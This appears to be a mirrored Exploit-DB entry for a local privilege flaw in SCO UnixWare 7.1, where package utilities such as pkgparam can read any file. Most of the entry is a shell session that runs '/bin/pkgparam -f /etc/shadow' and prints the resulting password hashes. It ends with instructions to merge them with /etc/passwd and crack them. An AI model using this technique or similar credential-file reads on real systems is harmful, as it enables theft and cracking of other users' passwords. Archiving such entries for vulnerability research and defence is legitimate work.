bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/sco/local/19658.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/850/info
Certain versions of SCO's Unixware (only version 7.1 was tested) ship with a series of package install/removal utilities which due to design issues under the SCO UnixWare operating system may read any file on the system regardless of their permission set. This is due to the package commands (pkginfo, pkgcat, pkgparam, etc.) having extended access due to Discretionary Access
Controls (DAC) via /etc/security/tcb/privs. This mechanism is explained more thoroughly in the original message to Bugtraq which is listed in full in the 'Credit' section of this vulnerability entry.
bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999
/bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$
Now just concatenate the first field of /etc/passwd with this file and run your favorite cracker.
Reference in a new issue View git blame Copy permalink